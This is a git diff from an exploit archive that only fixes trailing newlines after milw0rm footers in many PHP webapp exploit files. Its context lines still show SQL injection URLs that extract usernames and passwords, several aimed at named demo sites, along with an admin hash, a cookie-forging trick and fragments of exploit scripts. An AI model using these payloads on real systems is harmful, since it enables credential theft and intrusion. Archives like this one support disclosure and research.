milw0rm.com [2008-08-21] \ No newline at end of file diff --git a/platforms/php/webapps/6291.txt b/platforms/php/webapps/6291.txt index 12a70ec69..8c953563d 100755 --- a/platforms/php/webapps/6291.txt +++ b/platforms/php/webapps/6291.txt @@ -193,4 +193,4 @@ value="12">Dezember ################################################################################# -# milw0rm.com [2008-08-23] +# milw0rm.com [2008-08-23] \ No newline at end of file diff --git a/platforms/php/webapps/6292.txt b/platforms/php/webapps/6292.txt index dcc1f06e1..fa937f08a 100755 --- a/platforms/php/webapps/6292.txt +++ b/platforms/php/webapps/6292.txt @@ -48,4 +48,4 @@ Exploit: http://localhost:8080/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/* -# milw0rm.com [2008-08-23] +# milw0rm.com [2008-08-23] \ No newline at end of file diff --git a/platforms/php/webapps/6294.txt b/platforms/php/webapps/6294.txt index f3d9fff4f..a5d505e88 100755 --- a/platforms/php/webapps/6294.txt +++ b/platforms/php/webapps/6294.txt @@ -39,4 +39,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2008-08-24] +# milw0rm.com [2008-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/6295.txt b/platforms/php/webapps/6295.txt index bbb821c2b..c6d552834 100755 --- a/platforms/php/webapps/6295.txt +++ b/platforms/php/webapps/6295.txt @@ -35,4 +35,4 @@ admin:21232f297a57a5a743894a0e4a801fc3 http://localhost/[installdir]/administrator/ -# milw0rm.com [2008-08-24] +# milw0rm.com [2008-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/6296.txt b/platforms/php/webapps/6296.txt index 37cd96074..b86634223 100755 --- a/platforms/php/webapps/6296.txt +++ b/platforms/php/webapps/6296.txt @@ -17,4 +17,4 @@ ## +FROM+xbtit_users+WHERE+id_level=8/* ## ============================================================================== -# milw0rm.com [2008-08-25] +# milw0rm.com [2008-08-25] \ No newline at end of file diff --git a/platforms/php/webapps/6297.txt b/platforms/php/webapps/6297.txt index 956946f02..16a66ee34 100755 --- a/platforms/php/webapps/6297.txt +++ b/platforms/php/webapps/6297.txt @@ -20,4 +20,4 @@ Dork: made by matterdaddy -# milw0rm.com [2008-08-25] +# milw0rm.com [2008-08-25] \ No newline at end of file diff --git a/platforms/php/webapps/6298.txt b/platforms/php/webapps/6298.txt index bc137b04e..65a43c5d8 100755 --- a/platforms/php/webapps/6298.txt +++ b/platforms/php/webapps/6298.txt @@ -26,4 +26,4 @@ listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6 Thanks: Zitt, rijy, Koller, NOmeR1, $n@]is_success) { exit; -# milw0rm.com [2008-08-25] +# milw0rm.com [2008-08-25] \ No newline at end of file diff --git a/platforms/php/webapps/6307.txt b/platforms/php/webapps/6307.txt index 2c268ae13..c041d387e 100755 --- a/platforms/php/webapps/6307.txt +++ b/platforms/php/webapps/6307.txt @@ -50,4 +50,4 @@ http://security.craftysyntax.com/updates/?v=2.14.6 Credits: James Bercegay of the GulfTech Security Research Team -# milw0rm.com [2008-08-25] +# milw0rm.com [2008-08-25] \ No newline at end of file diff --git a/platforms/php/webapps/6309.txt b/platforms/php/webapps/6309.txt index 43b9fbd8b..10cc352a2 100755 --- a/platforms/php/webapps/6309.txt +++ b/platforms/php/webapps/6309.txt @@ -35,4 +35,4 @@ proof of concept (admins login & password are not in database, so... ) just 4 fun -# milw0rm.com [2008-08-26] +# milw0rm.com [2008-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/631.txt b/platforms/php/webapps/631.txt index 4a8027f42..3650fa7e9 100755 --- a/platforms/php/webapps/631.txt +++ b/platforms/php/webapps/631.txt @@ -2,4 +2,4 @@ Example: http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201 -# milw0rm.com [2004-11-15] +# milw0rm.com [2004-11-15] \ No newline at end of file diff --git a/platforms/php/webapps/6310.txt b/platforms/php/webapps/6310.txt index a710a15d5..65d5c25a7 100755 --- a/platforms/php/webapps/6310.txt +++ b/platforms/php/webapps/6310.txt @@ -57,4 +57,4 @@ www.site.com/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,ad < -- bug code end of -- > -# milw0rm.com [2008-08-26] +# milw0rm.com [2008-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/6311.php b/platforms/php/webapps/6311.php index 2770e88d8..7d7c4ee71 100755 --- a/platforms/php/webapps/6311.php +++ b/platforms/php/webapps/6311.php @@ -81,4 +81,4 @@ if (strlen($url)>10) print ""; ?> -# milw0rm.com [2008-08-26] +# milw0rm.com [2008-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/6312.txt b/platforms/php/webapps/6312.txt index e1ca41267..830527b7b 100755 --- a/platforms/php/webapps/6312.txt +++ b/platforms/php/webapps/6312.txt @@ -124,4 +124,4 @@ Author: Corwin Contact: corwin88[dog]mail[dot]ru -------- -# milw0rm.com [2008-08-26] +# milw0rm.com [2008-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/6313.txt b/platforms/php/webapps/6313.txt index e467192cf..6e6b73fe0 100755 --- a/platforms/php/webapps/6313.txt +++ b/platforms/php/webapps/6313.txt @@ -105,4 +105,4 @@ ################################################################################################################## -# milw0rm.com [2008-08-26] +# milw0rm.com [2008-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/6314.txt b/platforms/php/webapps/6314.txt index e678ff8f2..1ef9053a1 100755 --- a/platforms/php/webapps/6314.txt +++ b/platforms/php/webapps/6314.txt @@ -38,4 +38,4 @@ ########################################################################################## -# milw0rm.com [2008-08-26] +# milw0rm.com [2008-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/6315.txt b/platforms/php/webapps/6315.txt index 12a505481..3e05669eb 100755 --- a/platforms/php/webapps/6315.txt +++ b/platforms/php/webapps/6315.txt @@ -29,4 +29,4 @@ Dork: iFdate v.2.0 iFdate v.2.0 Copyright -# milw0rm.com [2008-08-26] +# milw0rm.com [2008-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/6316.php b/platforms/php/webapps/6316.php index f153581a1..9d447f0d4 100755 --- a/platforms/php/webapps/6316.php +++ b/platforms/php/webapps/6316.php @@ -157,4 +157,4 @@ look you private messages 4 admin passwd hash -# milw0rm.com [2008-08-26] +# milw0rm.com [2008-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/6320.txt b/platforms/php/webapps/6320.txt index b64c6c0ba..47ed4587b 100755 --- a/platforms/php/webapps/6320.txt +++ b/platforms/php/webapps/6320.txt @@ -24,4 +24,4 @@ phpMyRealty <= 1.0.9 (pages.php id) Remote SQL Injection Vulnerability Powered by phpMyRealty 1.0.7 Powered by phpMyRealty.com -# milw0rm.com [2008-08-27] +# milw0rm.com [2008-08-27] \ No newline at end of file diff --git a/platforms/php/webapps/6321.txt b/platforms/php/webapps/6321.txt index 9b98893e5..3872b1ff8 100755 --- a/platforms/php/webapps/6321.txt +++ b/platforms/php/webapps/6321.txt @@ -21,4 +21,4 @@ Exploit: http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/* -# milw0rm.com [2008-08-27] +# milw0rm.com [2008-08-27] \ No newline at end of file diff --git a/platforms/php/webapps/6325.php b/platforms/php/webapps/6325.php index 63cb2654f..b8c62619b 100755 --- a/platforms/php/webapps/6325.php +++ b/platforms/php/webapps/6325.php @@ -1742,4 +1742,4 @@ $ipb->main(); ?> -# milw0rm.com [2008-08-29] +# milw0rm.com [2008-08-29] \ No newline at end of file diff --git a/platforms/php/webapps/6332.txt b/platforms/php/webapps/6332.txt index debe48a3b..b6a7244b8 100755 --- a/platforms/php/webapps/6332.txt +++ b/platforms/php/webapps/6332.txt @@ -72,4 +72,4 @@ First active Bookmarks Plugin and add new action and in the name field insert: #Gr33tz T0: Broken-security, providor , Şŷяįăn ĦλçЌΣr ,Sp!der_N3T and all my friends :) -# milw0rm.com [2008-08-30] +# milw0rm.com [2008-08-30] \ No newline at end of file diff --git a/platforms/php/webapps/6335.txt b/platforms/php/webapps/6335.txt index f650019cb..25c80c189 100755 --- a/platforms/php/webapps/6335.txt +++ b/platforms/php/webapps/6335.txt @@ -56,4 +56,4 @@ ____________________________( Greetz )_________________________________ Im IRAQi -# milw0rm.com [2008-08-31] +# milw0rm.com [2008-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/6336.txt b/platforms/php/webapps/6336.txt index e8b4c1bf1..76e98907d 100755 --- a/platforms/php/webapps/6336.txt +++ b/platforms/php/webapps/6336.txt @@ -64,4 +64,4 @@ ____________________________( Greetz )_________________________________ Im IRAQi -# milw0rm.com [2008-08-31] +# milw0rm.com [2008-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/6338.txt b/platforms/php/webapps/6338.txt index a9ff02ea0..a1983315d 100755 --- a/platforms/php/webapps/6338.txt +++ b/platforms/php/webapps/6338.txt @@ -22,4 +22,4 @@ Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional f ############################################################ -# milw0rm.com [2008-08-31] +# milw0rm.com [2008-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/6339.txt b/platforms/php/webapps/6339.txt index b635c1f2b..801971050 100755 --- a/platforms/php/webapps/6339.txt +++ b/platforms/php/webapps/6339.txt @@ -89,4 +89,4 @@ eX: http://www.hardlyeverwornit.com//logs/cron.log ###########################[[[[Th3 End]]]]]################################# -# milw0rm.com [2008-08-31] +# milw0rm.com [2008-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/6341.txt b/platforms/php/webapps/6341.txt index 49501397c..26ef88e76 100755 --- a/platforms/php/webapps/6341.txt +++ b/platforms/php/webapps/6341.txt @@ -3,4 +3,4 @@ Download :: http://www.sourceforge.net/projects/simpleauction Found By ::Stack http://www.site.il/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* -# milw0rm.com [2008-09-01] +# milw0rm.com [2008-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/6342.txt b/platforms/php/webapps/6342.txt index 1f473a6fe..cf6bc9edf 100755 --- a/platforms/php/webapps/6342.txt +++ b/platforms/php/webapps/6342.txt @@ -17,4 +17,4 @@ PoC on demo site: http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user -# milw0rm.com [2008-09-01] +# milw0rm.com [2008-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/6343.txt b/platforms/php/webapps/6343.txt index ed6c28700..7db8b16ca 100755 --- a/platforms/php/webapps/6343.txt +++ b/platforms/php/webapps/6343.txt @@ -23,4 +23,4 @@ Dr.2 , General C , CcTero0liTi , GolD_M .. & all my friends .. ------------------------------------------- -# milw0rm.com [2008-09-01] +# milw0rm.com [2008-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/6344.php b/platforms/php/webapps/6344.php index be299924a..2d37f72c9 100755 --- a/platforms/php/webapps/6344.php +++ b/platforms/php/webapps/6344.php @@ -107,4 +107,4 @@ while(1) } ?> -# milw0rm.com [2008-09-01] +# milw0rm.com [2008-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/6346.pl b/platforms/php/webapps/6346.pl index e31adf10c..dbfbe7d75 100755 --- a/platforms/php/webapps/6346.pl +++ b/platforms/php/webapps/6346.pl @@ -50,4 +50,4 @@ print qq{ } #virangar.net[2008-05-22] -# milw0rm.com [2008-09-01] +# milw0rm.com [2008-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/6347.txt b/platforms/php/webapps/6347.txt index 9b51d9442..486b36ef2 100755 --- a/platforms/php/webapps/6347.txt +++ b/platforms/php/webapps/6347.txt @@ -22,4 +22,4 @@ Injection attack is possible (without using spaces and brackets). ############################################################ -# milw0rm.com [2008-09-02] +# milw0rm.com [2008-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/6348.txt b/platforms/php/webapps/6348.txt index 813b40f52..eb1b32a88 100755 --- a/platforms/php/webapps/6348.txt +++ b/platforms/php/webapps/6348.txt @@ -54,4 +54,4 @@ ____________________________( Greetz )_________________________________ Im IRAQi -# milw0rm.com [2008-09-02] +# milw0rm.com [2008-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/6349.txt b/platforms/php/webapps/6349.txt index dae358991..d63785b03 100755 --- a/platforms/php/webapps/6349.txt +++ b/platforms/php/webapps/6349.txt @@ -51,4 +51,4 @@ ____________________________( Greetz )_________________________________ Im IRAQi -# milw0rm.com [2008-09-02] +# milw0rm.com [2008-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/635.txt b/platforms/php/webapps/635.txt index 37c0ca9af..bea69111a 100755 --- a/platforms/php/webapps/635.txt +++ b/platforms/php/webapps/635.txt @@ -2,4 +2,4 @@ Example: http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/* -# milw0rm.com [2004-11-16] +# milw0rm.com [2004-11-16] \ No newline at end of file diff --git a/platforms/php/webapps/6350.txt b/platforms/php/webapps/6350.txt index 9554b87f0..b2ba9bb1f 100755 --- a/platforms/php/webapps/6350.txt +++ b/platforms/php/webapps/6350.txt @@ -48,4 +48,4 @@ ################################################################################################# ################################################################################################# -# milw0rm.com [2008-09-02] +# milw0rm.com [2008-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/6351.txt b/platforms/php/webapps/6351.txt index 8ec055e49..16d51be80 100755 --- a/platforms/php/webapps/6351.txt +++ b/platforms/php/webapps/6351.txt @@ -68,4 +68,4 @@ <<->> All muslims -# milw0rm.com [2008-09-02] +# milw0rm.com [2008-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/6352.txt b/platforms/php/webapps/6352.txt index e581f4ecc..29669faad 100755 --- a/platforms/php/webapps/6352.txt +++ b/platforms/php/webapps/6352.txt @@ -61,4 +61,4 @@ Related Info: The original advisory can be found at the following location http://www.gulftech.org/?node=research&article_id=00128-09022008 -# milw0rm.com [2008-09-02] +# milw0rm.com [2008-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/6354.txt b/platforms/php/webapps/6354.txt index ef782565d..b9e4f4d5e 100755 --- a/platforms/php/webapps/6354.txt +++ b/platforms/php/webapps/6354.txt @@ -63,4 +63,4 @@ <<->> All muslims -# milw0rm.com [2008-09-03] +# milw0rm.com [2008-09-03] \ No newline at end of file diff --git a/platforms/php/webapps/6356.php b/platforms/php/webapps/6356.php index 1d0991998..7dae9252e 100755 --- a/platforms/php/webapps/6356.php +++ b/platforms/php/webapps/6356.php @@ -52,4 +52,4 @@ echo curl_exec($c); curl_close($c); ?> -# milw0rm.com [2008-09-03] +# milw0rm.com [2008-09-03] \ No newline at end of file diff --git a/platforms/php/webapps/6357.txt b/platforms/php/webapps/6357.txt index a7844236a..107d7f4e1 100755 --- a/platforms/php/webapps/6357.txt +++ b/platforms/php/webapps/6357.txt @@ -50,4 +50,4 @@ http://site.com/album/album.asp?action=summary&message= www.biyosecurity.com - www.heykirmedya.net [Yakinda Online] -# milw0rm.com [2008-09-04] +# milw0rm.com [2008-09-04] \ No newline at end of file diff --git a/platforms/php/webapps/6364.txt b/platforms/php/webapps/6364.txt index ef9b982f7..b78229454 100755 --- a/platforms/php/webapps/6364.txt +++ b/platforms/php/webapps/6364.txt @@ -74,4 +74,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-09-04] +# milw0rm.com [2008-09-04] \ No newline at end of file diff --git a/platforms/php/webapps/6368.php b/platforms/php/webapps/6368.php index 614763f2e..193be5eb5 100755 --- a/platforms/php/webapps/6368.php +++ b/platforms/php/webapps/6368.php @@ -66,4 +66,4 @@ while(1){ } ?> -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6369.py b/platforms/php/webapps/6369.py index 717b94b6e..b0d648b20 100755 --- a/platforms/php/webapps/6369.py +++ b/platforms/php/webapps/6369.py @@ -62,4 +62,4 @@ else : print '[-]Can not inject code.' exit() -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6370.pl b/platforms/php/webapps/6370.pl index 8f0ada540..09a2fb70c 100755 --- a/platforms/php/webapps/6370.pl +++ b/platforms/php/webapps/6370.pl @@ -209,4 +209,4 @@ sub _IS_VULN return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ; } -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6371.txt b/platforms/php/webapps/6371.txt index 2dfb1f146..969eee542 100755 --- a/platforms/php/webapps/6371.txt +++ b/platforms/php/webapps/6371.txt @@ -27,4 +27,4 @@ # Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR ######################################################### -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6373.txt b/platforms/php/webapps/6373.txt index 09a919afb..2165380d1 100755 --- a/platforms/php/webapps/6373.txt +++ b/platforms/php/webapps/6373.txt @@ -27,4 +27,4 @@ # Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR ######################################################### -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6374.txt b/platforms/php/webapps/6374.txt index 75a2f2f2e..61e934cbf 100755 --- a/platforms/php/webapps/6374.txt +++ b/platforms/php/webapps/6374.txt @@ -27,4 +27,4 @@ # Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR ######################################################### -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6375.txt b/platforms/php/webapps/6375.txt index 209878962..f3cfd4f80 100755 --- a/platforms/php/webapps/6375.txt +++ b/platforms/php/webapps/6375.txt @@ -27,4 +27,4 @@ # Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR ######################################################### -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6376.txt b/platforms/php/webapps/6376.txt index cd0e3494a..38aed8264 100755 --- a/platforms/php/webapps/6376.txt +++ b/platforms/php/webapps/6376.txt @@ -27,4 +27,4 @@ # Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR ######################################################### -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6378.txt b/platforms/php/webapps/6378.txt index b575266ee..5ac1e528e 100755 --- a/platforms/php/webapps/6378.txt +++ b/platforms/php/webapps/6378.txt @@ -15,4 +15,4 @@ Live Demo http://www.vastal.com/jobs/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/* ############################################################################################################## -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6379.txt b/platforms/php/webapps/6379.txt index e7c9cc6e7..f9203cb41 100755 --- a/platforms/php/webapps/6379.txt +++ b/platforms/php/webapps/6379.txt @@ -19,4 +19,4 @@ Live Demo http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/* http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/* -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6380.txt b/platforms/php/webapps/6380.txt index 76b1bf6c3..b615c67eb 100755 --- a/platforms/php/webapps/6380.txt +++ b/platforms/php/webapps/6380.txt @@ -15,4 +15,4 @@ http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,passwor Live Demo http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/* -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6381.txt b/platforms/php/webapps/6381.txt index cc543dfe8..6f8fee488 100755 --- a/platforms/php/webapps/6381.txt +++ b/platforms/php/webapps/6381.txt @@ -15,4 +15,4 @@ http://site.il/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,u Live Demo http://www.vastal.com/freelance/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/* -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6382.txt b/platforms/php/webapps/6382.txt index bb0c1e0df..bc133530c 100755 --- a/platforms/php/webapps/6382.txt +++ b/platforms/php/webapps/6382.txt @@ -15,4 +15,4 @@ Live Demo http://www.vastal.com/cosmetics_zone/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/* ############################################################################################################## -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6383.txt b/platforms/php/webapps/6383.txt index 6db3bf9c3..eef7767ee 100755 --- a/platforms/php/webapps/6383.txt +++ b/platforms/php/webapps/6383.txt @@ -41,4 +41,4 @@ ____________________________( Greetz )_________________________________ | and all algeria hackers and all mouslimme |__________________________ramadan karim all mouslimme____________________________________________ -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6385.txt b/platforms/php/webapps/6385.txt index 5d24e63db..f45fcb95f 100755 --- a/platforms/php/webapps/6385.txt +++ b/platforms/php/webapps/6385.txt @@ -21,4 +21,4 @@ http://www.inthewild.xxx/path/keyword_search_action.php?gender=xxx&martial=&fage http://www.vastal.com/shaadi_zone_1.0.9/keyword_search_action.php?gender=male&martial=&fage=18&tage=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat(username,0x3a,password),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from users/* -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/6388.txt b/platforms/php/webapps/6388.txt index dc797771a..b937d57c0 100755 --- a/platforms/php/webapps/6388.txt +++ b/platforms/php/webapps/6388.txt @@ -33,4 +33,4 @@ Yemisim Alaskasini : ) ) insan1n kendi memleketi gibisi yokk : ) ) ########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ############################## -# milw0rm.com [2008-09-06] +# milw0rm.com [2008-09-06] \ No newline at end of file diff --git a/platforms/php/webapps/6390.txt b/platforms/php/webapps/6390.txt index ba09953f2..5101ccc7a 100755 --- a/platforms/php/webapps/6390.txt +++ b/platforms/php/webapps/6390.txt @@ -18,4 +18,4 @@ greetings from germany TheJT -# milw0rm.com [2008-09-06] +# milw0rm.com [2008-09-06] \ No newline at end of file diff --git a/platforms/php/webapps/6392.php b/platforms/php/webapps/6392.php index 4809ac9b1..772a46f49 100755 --- a/platforms/php/webapps/6392.php +++ b/platforms/php/webapps/6392.php @@ -138,4 +138,4 @@ $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10); echo "[+] Success! To set password visit this link:\nhttp://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n"; ?> -# milw0rm.com [2008-09-06] +# milw0rm.com [2008-09-06] \ No newline at end of file diff --git a/platforms/php/webapps/6393.pl b/platforms/php/webapps/6393.pl index d90c88a8b..8f3d719be 100755 --- a/platforms/php/webapps/6393.pl +++ b/platforms/php/webapps/6393.pl @@ -190,4 +190,4 @@ sub usage { exit; } -# milw0rm.com [2008-09-06] +# milw0rm.com [2008-09-06] \ No newline at end of file diff --git a/platforms/php/webapps/6395.txt b/platforms/php/webapps/6395.txt index 7973912d6..82445c9f1 100755 --- a/platforms/php/webapps/6395.txt +++ b/platforms/php/webapps/6395.txt @@ -42,4 +42,4 @@ Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com -# milw0rm.com [2008-09-07] +# milw0rm.com [2008-09-07] \ No newline at end of file diff --git a/platforms/php/webapps/6396.txt b/platforms/php/webapps/6396.txt index 9a21abb13..e1faf3b35 100755 --- a/platforms/php/webapps/6396.txt +++ b/platforms/php/webapps/6396.txt @@ -58,4 +58,4 @@ ################################################################ # Vuln Discovered 7th Sep 2008 -# milw0rm.com [2008-09-07] +# milw0rm.com [2008-09-07] \ No newline at end of file diff --git a/platforms/php/webapps/6397.txt b/platforms/php/webapps/6397.txt index 0e75a7e6f..fdbd6110d 100755 --- a/platforms/php/webapps/6397.txt +++ b/platforms/php/webapps/6397.txt @@ -31,4 +31,4 @@ now, we have duplicated 'admin' account in database 6. admin's password changed, but new password will be send to correct admin email ;/ -# milw0rm.com [2008-09-07] +# milw0rm.com [2008-09-07] \ No newline at end of file diff --git a/platforms/php/webapps/6398.txt b/platforms/php/webapps/6398.txt index fa0516079..72bd7e5f8 100755 --- a/platforms/php/webapps/6398.txt +++ b/platforms/php/webapps/6398.txt @@ -10,4 +10,4 @@ exp:http://www.ephpscripts.com/demo/eshop/search_results.php?cid=-1/**/union/**/ Persian Gulf Forever Iraninan xxxers :D -# milw0rm.com [2008-09-07] +# milw0rm.com [2008-09-07] \ No newline at end of file diff --git a/platforms/php/webapps/6401.txt b/platforms/php/webapps/6401.txt index e1db7ecc8..14f0d62f8 100755 --- a/platforms/php/webapps/6401.txt +++ b/platforms/php/webapps/6401.txt @@ -58,4 +58,4 @@ ################################################################ # Vuln Discovered 9th Sep 2008 -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6402.txt b/platforms/php/webapps/6402.txt index e14a0856a..8c46aaa37 100755 --- a/platforms/php/webapps/6402.txt +++ b/platforms/php/webapps/6402.txt @@ -32,4 +32,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6403.txt b/platforms/php/webapps/6403.txt index 1a65225c5..05faa208d 100755 --- a/platforms/php/webapps/6403.txt +++ b/platforms/php/webapps/6403.txt @@ -43,4 +43,4 @@ ########################################################### -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6404.txt b/platforms/php/webapps/6404.txt index 0bf39411d..886df8cc7 100755 --- a/platforms/php/webapps/6404.txt +++ b/platforms/php/webapps/6404.txt @@ -60,4 +60,4 @@ <<->> All muslims -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6406.txt b/platforms/php/webapps/6406.txt index ed39f9443..619187679 100755 --- a/platforms/php/webapps/6406.txt +++ b/platforms/php/webapps/6406.txt @@ -34,4 +34,4 @@ javascript:document.cookie = "bsm=1; path=/"; now you can get admin access and manage the cms ;) ------------------------------------------- -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6408.txt b/platforms/php/webapps/6408.txt index 57fb2cfb0..130723646 100755 --- a/platforms/php/webapps/6408.txt +++ b/platforms/php/webapps/6408.txt @@ -48,4 +48,4 @@ ################################################################################################# ################################################################################################# -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6409.txt b/platforms/php/webapps/6409.txt index eded6f099..bbb8efa58 100755 --- a/platforms/php/webapps/6409.txt +++ b/platforms/php/webapps/6409.txt @@ -43,4 +43,4 @@ ########################################################### -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6410.txt b/platforms/php/webapps/6410.txt index e9ff4d002..aa9d9d2ae 100755 --- a/platforms/php/webapps/6410.txt +++ b/platforms/php/webapps/6410.txt @@ -43,4 +43,4 @@ Iranian Hacker & Kurdish Security TEAM & My Mother #################### -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6411.txt b/platforms/php/webapps/6411.txt index 69b033f10..68c34b072 100755 --- a/platforms/php/webapps/6411.txt +++ b/platforms/php/webapps/6411.txt @@ -45,4 +45,4 @@ ########################################################### -# milw0rm.com [2008-09-09] +# milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6412.txt b/platforms/php/webapps/6412.txt index 7199bbdc8..0abdea435 100755 --- a/platforms/php/webapps/6412.txt +++ b/platforms/php/webapps/6412.txt @@ -11,4 +11,4 @@ username http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin-- http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17-- -# milw0rm.com [2008-09-09] +# 